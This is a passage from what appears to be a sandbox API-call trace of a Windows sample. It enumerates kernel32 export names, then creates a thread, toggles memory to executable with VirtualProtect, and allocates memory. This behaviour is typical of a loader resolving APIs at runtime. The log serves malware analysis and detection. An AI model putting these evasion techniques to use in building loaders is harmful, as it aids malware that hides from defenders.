lstrlenA (lpString="CREATEPIPE") returned 10 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0030.549] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0030.549] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0030.549] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.549] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0030.550] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0030.550] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0030.550] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0030.550] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0030.550] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0030.550] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0030.550] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0030.550] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0030.550] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0030.550] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0030.550] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0030.550] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0030.550] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0030.550] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0030.550] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0030.550] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0030.550] lstrlenA (lpString="CREATETHREAD") returned 12 [0030.550] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xa6620, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4 [0030.552] RtlExitUserThread (Status=0x0) Thread: id = 3 os_tid = 0x9a8 [0030.563] VirtualProtect (in: lpAddress=0x70000, dwSize=0x254, flNewProtect=0x4, lpflOldProtect=0xc9f790 | out: lpflOldProtect=0xc9f790*=0x40) returned 1 [0030.563] VirtualProtect (in: lpAddress=0x70000, dwSize=0x254, flNewProtect=0x40, lpflOldProtect=0xc9f794 | out: lpflOldProtect=0xc9f794*=0x4) returned 1 [0030.569] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0030.576] VirtualAlloc (lpAddress=0x0, dwSize=0x101, flAllocationType=0x3000, flProtect=0x4) returned 0x100000 [0030.576] lstrlenA (lpString="kernel32.dll") returned 12 [0030.576] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.576] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.576] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.576] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.576] lstrlenA (lpString="ADDATOMA") returned 8 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.576] lstrlenA (lpString="ADDATOMW") returned 8 [0030.576] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.576] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.577] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.577] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.577] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.577] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.577] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.577] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.577] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.577] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.577] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.577] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.577] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.577] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.577] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.577] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.577] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.577] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.577] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.577] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.578] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.578] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.578] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.578] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.578] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.578] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.578] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.578] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.578] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.578] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.578] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0030.578] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.578] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.578] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.578] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.578] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.578] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.579] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.579] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.579] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.579] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.579] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.579] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.579] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.579] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.579] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.579] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.579] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.579] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.579] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.579] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.579] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.579] lstrlenA (lpString="BEEP") returned 4 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.579] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.579] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.580] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.580] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.580] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.580] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.580] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.580] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.580] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.580] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.580] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.580] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.580] lstrlenA (lpString="CANCELIO") returned 8 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.580] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.580] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.580] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.580] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.580] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.580] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.580] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.581] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.581] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.581] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.581] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.581] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.581] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.581] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.581] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.581] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.581] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0030.581] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0030.581] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0030.581] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0030.581] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0030.581] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0030.581] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0030.581] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0030.582] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0030.582] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0030.582] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0030.582] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0030.582] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0030.582] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0030.582] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0030.582] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0030.582] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0030.582] lstrcpyA (in: lpString1=0xc9ea74, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0030.582] lstrlenA (lpString="COMPARESTRINGEX") returned 15 